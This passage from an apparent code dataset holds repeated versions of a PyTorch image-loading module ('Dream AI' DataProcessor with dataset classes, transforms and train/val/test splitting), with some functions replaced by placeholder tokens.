transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, 